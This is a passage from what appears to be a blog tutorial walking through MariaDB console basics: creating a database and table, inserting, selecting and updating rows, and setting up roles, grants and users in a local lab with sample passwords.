<span style="color: white;">Your MariaDB connection id is 37</span>
<span style="color: white;">Server version: 10.6.8-MariaDB-1 Debian buildd-unstable</span>
<span style="color: white;">Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.</span>
<span style="color: white;">Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.</span>
<span style="color: white;">MariaDB [(none)]> </span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Looking to see the current databases:</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [(none)]> show databases;</span>
<span style="color: white;">+--------------------+</span>
<span style="color: white;">| Database |</span>
<span style="color: white;">+--------------------+</span>
<span style="color: white;">| information_schema |</span>
<span style="color: white;">| mysql |</span>
<span style="color: white;">| performance_schema |</span>
<span style="color: white;">| sys |</span>
<span style="color: white;">+--------------------+</span>
<span style="color: white;">4 rows in set (0.009 sec)</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Creating my own database and verifying its creation.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [(none)]> CREATE DATABASE IF NOT EXISTS securitynik_db;</span>
<span style="color: white;">Query OK, 1 row affected (0.000 sec)</span>
<span style="color: white;">MariaDB [(none)]> show databases;</span>
<span style="color: white;">+--------------------+</span>
<span style="color: white;">| Database |</span>
<span style="color: white;">+--------------------+</span>
<span style="color: white;">| information_schema |</span>
<span style="color: white;">| mysql |</span>
<span style="color: white;">| performance_schema |</span>
<span style="color: white;">| securitynik_db |</span>
<span style="color: white;">| sys |</span>
<span style="color: white;">+--------------------+</span>
<span style="color: white;">5 rows in set (0.000 sec)</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Change to my newly created database</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [(none)]> use securitynik_db;</span>
<span style="color: white;">Database changed</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Create a table named <i>interesting_data</i>.</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> CREATE TABLE IF NOT EXISTS interesting_data ( </span>
<span style="color: white;"> -> file_no INT NOT NULL AUTO_INCREMENT PRIMARY KEY,</span>
<span style="color: white;"> -> owner VARCHAR(100), </span>
<span style="color: white;"> -> password VARCHAR(100))</span>
<span style="color: white;"> -> COMMENT 'This database contains sensitive information';</span>
<span style="color: white;">Query OK, 0 rows affected (0.027 sec)</span>
</pre></div>
</div><div><br /></div><div>Verify the table was successfully created</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> show tables;</span>
<span style="color: white;">+--------------------------+</span>
<span style="color: white;">| Tables_in_securitynik_db |</span>
<span style="color: white;">+--------------------------+</span>
<span style="color: white;">| interesting_data |</span>
<span style="color: white;">+--------------------------+</span>
<span style="color: white;">1 row in set (0.000 sec)</span>
</pre></div>
</div><div><br /></div><div><div>Alternatively</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> SHOW TABLES FROM securitynik_db;</span>
<span style="color: white;">+--------------------------+</span>
<span style="color: white;">| Tables_in_securitynik_db |</span>
<span style="color: white;">+--------------------------+</span>
<span style="color: white;">| interesting_data |</span>
<span style="color: white;">+--------------------------+</span>
</pre></div>
</div><div><br /></div><div><div><br /></div><div>Verifying the table structure:</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> DESCRIBE interesting_data;</span>
<span style="color: white;">+----------+--------------+------+-----+---------+----------------+</span>
<span style="color: white;">| Field | Type | Null | Key | Default | Extra |</span>
<span style="color: white;">+----------+--------------+------+-----+---------+----------------+</span>
<span style="color: white;">| file_no | int(11) | NO | PRI | NULL | auto_increment |</span>
<span style="color: white;">| owner | varchar(100) | YES | | NULL | |</span>
<span style="color: white;">| password | varchar(100) | YES | | NULL | |</span>
<span style="color: white;">+----------+--------------+------+-----+---------+----------------+</span>
</pre></div>
</div><div><br /></div><div>Alternatively </div><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> SHOW FULL COLUMNS FROM interesting_data</span>
<span style="color: white;"> -> ;</span>
<span style="color: white;">+----------+--------------+--------------------+------+-----+---------+----------------+---------------------------------+---------+</span>
<span style="color: white;">| Field | Type | Collation | Null | Key | Default | Extra | Privileges | Comment |</span>
<span style="color: white;">+----------+--------------+--------------------+------+-----+---------+----------------+---------------------------------+---------+</span>
<span style="color: white;">| file_no | int(11) | NULL | NO | PRI | NULL | auto_increment | select,insert,update,references | |</span>
<span style="color: white;">| owner | varchar(100) | utf8mb4_general_ci | YES | | NULL | | select,insert,update,references | |</span>
<span style="color: white;">| password | varchar(100) | utf8mb4_general_ci | YES | | NULL | | select,insert,update,references | |</span>
<span style="color: white;">+----------+--------------+--------------------+------+-----+---------+----------------+---------------------------------+---------+</span>
<span style="color: white;">3 rows in set (0.001 sec)</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Yet another way of verifying the table creation.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> SHOW FULL COLUMNS FROM interesting_data \G;</span>
<span style="color: white;">*************************** 1. row ***************************</span>
<span style="color: white;"> Field: file_no</span>
<span style="color: white;"> Type: int(11)</span>
<span style="color: white;"> Collation: NULL</span>
<span style="color: white;"> Null: NO</span>
<span style="color: white;"> Key: PRI</span>
<span style="color: white;"> Default: NULL</span>
<span style="color: white;"> Extra: auto_increment</span>
<span style="color: white;">Privileges: select,insert,update,references</span>
<span style="color: white;"> Comment: </span>
<span style="color: white;">*************************** 2. row ***************************</span>
<span style="color: white;"> Field: owner</span>
<span style="color: white;"> Type: varchar(100)</span>
<span style="color: white;"> Collation: utf8mb4_general_ci</span>
<span style="color: white;"> Null: YES</span>
<span style="color: white;"> Key: </span>
<span style="color: white;"> Default: NULL</span>
<span style="color: white;"> Extra: </span>
<span style="color: white;">Privileges: select,insert,update,references</span>
<span style="color: white;"> Comment: </span>
<span style="color: white;">*************************** 3. row ***************************</span>
<span style="color: white;"> Field: password</span>
<span style="color: white;"> Type: varchar(100)</span>
<span style="color: white;"> Collation: utf8mb4_general_ci</span>
<span style="color: white;"> Null: YES</span>
<span style="color: white;"> Key: </span>
<span style="color: white;"> Default: NULL</span>
<span style="color: white;"> Extra: </span>
<span style="color: white;">Privileges: select,insert,update,references</span>
<span style="color: white;"> Comment: </span>
<span style="color: white;">3 rows in set (0.000 sec)</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>With the table created, let's alter that table before adding some data</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> ALTER TABLE interesting_data ADD admin VARCHAR(2) NOT NULL DEFAULT 'Y';</span>
<span style="color: white;">Query OK, 0 rows affected (0.017 sec)</span>
<span style="color: white;">Records: 0 Duplicates: 0 Warnings: 0</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Add multiple column that we will ultimately delete</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> ALTER TABLE interesting_data ADD comments VARCHAR(255), ADD blogs VARCHAR(255), ADD delete_me VARCHAR(255);</span>
<span style="color: white;">Query OK, 0 rows affected (0.026 sec)</span>
<span style="color: white;">Records: 0 Duplicates: 0 Warnings: 0</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Show the table structure</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> SHOW FULL COLUMNS FROM interesting_data;</span>
<span style="color: white;">+-----------+--------------+--------------------+------+-----+---------+----------------+---------------------------------+---------+</span>
<span style="color: white;">| Field | Type | Collation | Null | Key | Default | Extra | Privileges | Comment |</span>
<span style="color: white;">+-----------+--------------+--------------------+------+-----+---------+----------------+---------------------------------+---------+</span>
<span style="color: white;">| file_no | int(11) | NULL | NO | PRI | NULL | auto_increment | select,insert,update,references | |</span>
<span style="color: white;">| owner | varchar(100) | utf8mb4_general_ci | YES | | NULL | | select,insert,update,references | |</span>
<span style="color: white;">| password | varchar(100) | utf8mb4_general_ci | YES | | NULL | | select,insert,update,references | |</span>
<span style="color: white;">| admin | varchar(2) | utf8mb4_general_ci | NO | | Y | | select,insert,update,references | |</span>
<span style="color: white;">| comments | varchar(255) | utf8mb4_general_ci | YES | | NULL | | select,insert,update,references | |</span>
<span style="color: white;">| blogs | varchar(255) | utf8mb4_general_ci | YES | | NULL | | select,insert,update,references | |</span>
<span style="color: white;">| delete_me | varchar(255) | utf8mb4_general_ci | YES | | NULL | | select,insert,update,references | |</span>
<span style="color: white;">+-----------+--------------+--------------------+------+-----+---------+----------------+---------------------------------+---------+</span>
<span style="color: white;">7 rows in set (0.001 sec)</span>
</pre></div>
</div><div><br /></div><div>With the table created with its various columns, let's add some data.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> INSERT INTO interesting_data(owner,password,admin,comments,blogs,delete_me) VALUES('securitynik','Testing1','Y','Systems Administrator','https://www.securitynik.com','you are to be deleted');</span>
<span style="color: white;">Query OK, 1 row affected (0.010 sec)</span>
</pre></div><br /></div><div><div>Note, you do not have to specify all columns, only the ones you need to fill in. Keep in mind, if something is <i>NOT</i> <i>Null</i>, you will need to have that column with a value, unless you specified a default value.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> INSERT INTO interesting_data(owner,password,admin,comments,blogs) VALUES('booo','Testing1','Y','Guest User','https://www.example.local');</span>
<span style="color: white;">Query OK, 1 row affected (0.009 sec)</span>
</pre></div>
</div><div><br /></div><div>Inserting multiple records at the same time. Also note the usage of my <i>DEFAULT </i>keyword, to leverage the default value of this column.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> INSERT INTO interesting_data(owner,password,admin,comments,blogs) VALUES('YouKnowWhoIAm','andYouKnowMyPassword',DEFAULT,'some user','https://www.blah.local'), ('hello','world',DEFAULT,'hi','securitynik.local');</span>
<span style="color: white;">Query OK, 2 rows affected (0.012 sec)</span>
<span style="color: white;">Records: 2 Duplicates: 0 Warnings: 0</span>
</pre></div>
</div><div><br /></div><div>As we have added some records, let's see what is returned by select <i>*</i> records</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> SELECT * FROM interesting_data;</span>
<span style="color: white;">+---------+---------------+----------------------+-------+-----------------------+-----------------------------+-----------------------+</span>
<span style="color: white;">| file_no | owner | password | admin | comments | blogs | delete_me |</span>
<span style="color: white;">+---------+---------------+----------------------+-------+-----------------------+-----------------------------+-----------------------+</span>
<span style="color: white;">| 1 | securitynik | Testing1 | Y | Systems Administrator | https://www.securitynik.com | you are to be deleted |</span>
<span style="color: white;">| 2 | booo | Testing1 | Y | Guest User | https://www.example.local | NULL |</span>
<span style="color: white;">| 3 | YouKnowWhoIAm | andYouKnowMyPassword | Y | some user | https://www.blah.local | NULL |</span>
<span style="color: white;">| 4 | hello | world | Y | hi | securitynik.local | NULL |</span>
<span style="color: white;">+---------+---------------+----------------------+-------+-----------------------+-----------------------------+-----------------------+</span>
<span style="color: white;">4 rows in set (0.000 sec)</span>
</pre></div>
</div><div><br /></div><div>Rather than all records, let's just select <i>owner, password and blogs</i> from the table</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> SELECT owner,password,blogs FROM interesting_data;</span>
<span style="color: white;">+---------------+----------------------+-----------------------------+</span>
<span style="color: white;">| owner | password | blogs |</span>
<span style="color: white;">+---------------+----------------------+-----------------------------+</span>
<span style="color: white;">| securitynik | Testing1 | https://www.securitynik.com |</span>
<span style="color: white;">| booo | Testing1 | https://www.example.local |</span>
<span style="color: white;">| YouKnowWhoIAm | andYouKnowMyPassword | https://www.blah.local |</span>
<span style="color: white;">| hello | world | securitynik.local |</span>
<span style="color: white;">+---------------+----------------------+-----------------------------+</span>
<span style="color: white;">4 rows in set (0.000 sec)</span>
</pre></div>
</div><div><br /></div><div>One more <i>SELECT</i>, this time using the <i>WHERE</i> clause. Notice the integer after the equal sign and the absence of quotes.</div><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> SELECT owner,password,blogs FROM interesting_data WHERE file_no=3;</span>
<span style="color: white;">+---------------+----------------------+------------------------+</span>
<span style="color: white;">| owner | password | blogs |</span>
<span style="color: white;">+---------------+----------------------+------------------------+</span>
<span style="color: white;">| YouKnowWhoIAm | andYouKnowMyPassword | https://www.blah.local |</span>
<span style="color: white;">+---------------+----------------------+------------------------+</span>
<span style="color: white;">1 row in set (0.000 sec)</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Alternatively, select all records using the <i>WHERE </i>criteria. Notice in this example, I am using a string. Note the quotes after the equal sign.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> SELECT * FROM interesting_data WHERE owner='YouKnowWhoIAm';</span>
<span style="color: white;">+---------+---------------+----------------------+-------+-----------+------------------------+-----------+</span>
<span style="color: white;">| file_no | owner | password | admin | comments | blogs | delete_me |</span>
<span style="color: white;">+---------+---------------+----------------------+-------+-----------+------------------------+-----------+</span>
<span style="color: white;">| 3 | YouKnowWhoIAm | andYouKnowMyPassword | Y | some user | https://www.blah.local | NULL |</span>
<span style="color: white;">+---------+---------------+----------------------+-------+-----------+------------------------+-----------+</span>
<span style="color: white;">1 row in set (0.000 sec)</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Update a record<br /><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> UPDATE LOW_PRIORITY IGNORE interesting_data SET owner='owner_updated_YouKnowWhoIAm', password='You changed me :-(' WHERE file_no=3;</span>
<span style="color: white;">Query OK, 1 row affected (0.009 sec)</span>
<span style="color: white;">Rows matched: 1 Changed: 1 Warnings: 0</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Verify the change</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> SELECT owner,password,blogs FROM interesting_data WHERE file_no=3;</span>
<span style="color: white;">+-----------------------------+--------------------+------------------------+</span>
<span style="color: white;">| owner | password | blogs |</span>
<span style="color: white;">+-----------------------------+--------------------+------------------------+</span>
<span style="color: white;">| owner_updated_YouKnowWhoIAm | You changed me :-( | https://www.blah.local |</span>
<span style="color: white;">+-----------------------------+--------------------+------------------------+</span>
<span style="color: white;">1 row in set (0.000 sec)</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Before sharing our database with other users, let's see what permissions exists on the server.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> SHOW GRANTS;</span>
<span style="color: white;">+-----------------------------------------------------------------------------------------------------------------------------------------+</span>
<span style="color: white;">| Grants for root@localhost |</span>
<span style="color: white;">+-----------------------------------------------------------------------------------------------------------------------------------------+</span>
<span style="color: white;">| GRANT ALL PRIVILEGES ON *.* TO `root`@`localhost` IDENTIFIED VIA mysql_native_password USING 'invalid' OR unix_socket WITH GRANT OPTION |</span>
<span style="color: white;">| GRANT PROXY ON ''@'%' TO 'root'@'localhost' WITH GRANT OPTION |</span>
<span style="color: white;">+-----------------------------------------------------------------------------------------------------------------------------------------+</span>
<span style="color: white;">2 rows in set (0.000 sec)</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>If you wanted to see permission for a particular user</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> SHOW GRANTS FOR root@localhost;</span>
<span style="color: white;">+-----------------------------------------------------------------------------------------------------------------------------------------+</span>
<span style="color: white;">| Grants for root@localhost |</span>
<span style="color: white;">+-----------------------------------------------------------------------------------------------------------------------------------------+</span>
<span style="color: white;">| GRANT ALL PRIVILEGES ON *.* TO `root`@`localhost` IDENTIFIED VIA mysql_native_password USING 'invalid' OR unix_socket WITH GRANT OPTION |</span>
<span style="color: white;">| GRANT PROXY ON ''@'%' TO 'root'@'localhost' WITH GRANT OPTION |</span>
<span style="color: white;">+-----------------------------------------------------------------------------------------------------------------------------------------+</span>
<span style="color: white;">2 rows in set (0.000 sec)</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Alternatively ...</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> SHOW GRANTS FOR CURRENT_USER;</span>
<span style="color: white;">+-----------------------------------------------------------------------------------------------------------------------------------------+</span>
<span style="color: white;">| Grants for root@localhost |</span>
<span style="color: white;">+-----------------------------------------------------------------------------------------------------------------------------------------+</span>
<span style="color: white;">| GRANT ALL PRIVILEGES ON *.* TO `root`@`localhost` IDENTIFIED VIA mysql_native_password USING 'invalid' OR unix_socket WITH GRANT OPTION |</span>
<span style="color: white;">| GRANT PROXY ON ''@'%' TO 'root'@'localhost' WITH GRANT OPTION |</span>
<span style="color: white;">+-----------------------------------------------------------------------------------------------------------------------------------------+</span>
<span style="color: white;">2 rows in set (0.000 sec)</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Let's create and verify two roles.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> CREATE ROLE 'securitynik_db_admins';</span>
<span style="color: white;">Query OK, 0 rows affected (0.009 sec)</span>
<span style="color: white;"><br /></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> CREATE ROLE 'securitynik_db_users';</span>
<span style="color: white;">Query OK, 0 rows affected (0.012 sec)</span>
<span style="color: white;">Verify the role has been created</span>
<span style="color: white;">MariaDB [securitynik_db]> SHOW GRANTS FOR 'securitynik_db_admins';</span>
<span style="color: white;">+-----------------------------------------------+</span>
<span style="color: white;">| Grants for securitynik_db_admins |</span>
<span style="color: white;">+-----------------------------------------------+</span>
<span style="color: white;">| GRANT USAGE ON *.* TO `securitynik_db_admins` |</span>
<span style="color: white;">+-----------------------------------------------+</span>
<span style="color: white;">MariaDB [securitynik_db]> SHOW GRANTS FOR securitynik_db_users;</span>
<span style="color: white;">+----------------------------------------------+</span>
<span style="color: white;">| Grants for securitynik_db_users |</span>
<span style="color: white;">+----------------------------------------------+</span>
<span style="color: white;">| GRANT USAGE ON *.* TO `securitynik_db_users` |</span>
<span style="color: white;">+----------------------------------------------+</span>
</pre></div> <div>Grant all privileges to the <i>securitynik_db_admins</i><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> GRANT ALL ON securitynik_db.* TO 'securitynik_db_admins';</span>
<span style="color: white;">Query OK, 0 rows affected (0.009 sec)</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Grant <i>SELECT </i>permissions only to <i>securitynik_db_users</i>.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> GRANT SELECT ON securitynik_db.* TO 'securitynik_db_users';</span>
<span style="color: white;">Query OK, 0 rows affected (0.009 sec)</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>With the roles created and their access specified, time to add users.</p><p>Create an <i>admin </i>user.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> CREATE USER IF NOT EXISTS 'admin' IDENTIFIED BY 'Testing1' PASSWORD EXPIRE INTERVAL 365 DAY;</span>
<span style="color: white;">Query OK, 0 rows affected (0.009 sec)</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Create a set of normal users</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> CREATE USER 'securitynik' IDENTIFIED BY 'Testing1', 'nakia'@'localhost' IDENTIFIED BY 'Testing1', 'neysa@localhost' IDENTIFIED BY 'Testing1' PASSWORD EXPIRE INTERVAL 180 DAY ACCOUNT LOCK;</span>
<span style="color: white;">Query OK, 0 rows affected (0.009 sec)</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Reviewing the <i>mysql.user</i> table to identify possible fields to view</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> DESCRIBE mysql.user;</span>
<span style="color: white;">+------------------------+---------------------+------+-----+----------+-------+</span>
<span style="color: white;">| Field | Type | Null | Key | Default | Extra |</span>
<span style="color: white;">+------------------------+---------------------+------+-----+----------+-------+</span>
<span style="color: white;">| Host | char(255) | NO | | | |</span>
<span style="color: white;">| User | char(128) | NO | | | |</span>
<span style="color: white;">| Password | longtext | YES | | NULL | |</span>
<span style="color: white;">| Select_priv | varchar(1) | YES | | NULL | |</span>
<span style="color: white;">| Insert_priv | varchar(1) | YES | | NULL | |</span>
<span style="color: white;">| Update_priv | varchar(1) | YES | | NULL | |</span>
<span style="color: white;">| Delete_priv | varchar(1) | YES | | NULL | |</span>
<span style="color: white;">| Create_priv | varchar(1) | YES | | NULL | |</span>
<span style="color: white;">| Drop_priv | varchar(1) | YES | | NULL | |</span>
<span style="color: white;">| Reload_priv | varchar(1) | YES | | NULL | |</span>
<span style="color: white;">| Shutdown_priv | varchar(1) | YES | | NULL | |</span>
<span style="color: white;">| Process_priv | varchar(1) | YES | | NULL | |</span>
<span style="color: white;">| File_priv | varchar(1) | YES | | NULL | |</span>
<span style="color: white;">| Grant_priv | varchar(1) | YES | | NULL | |</span>
<span style="color: white;">| References_priv | varchar(1) | YES | | NULL | |</span>
<span style="color: white;">| Index_priv | varchar(1) | YES | | NULL | |</span>
<span style="color: white;">| Alter_priv | varchar(1) | YES | | NULL | |</span>
<span style="color: white;">| Show_db_priv | varchar(1) | YES | | NULL | |</span>
<span style="color: white;">.... TRUNCATED FOR BREVITY ....</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Selecting some data points ...</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> SELECT user,host,password,default_role,max_connections,max_user_connections,is_role FROM mysql.user; </span>
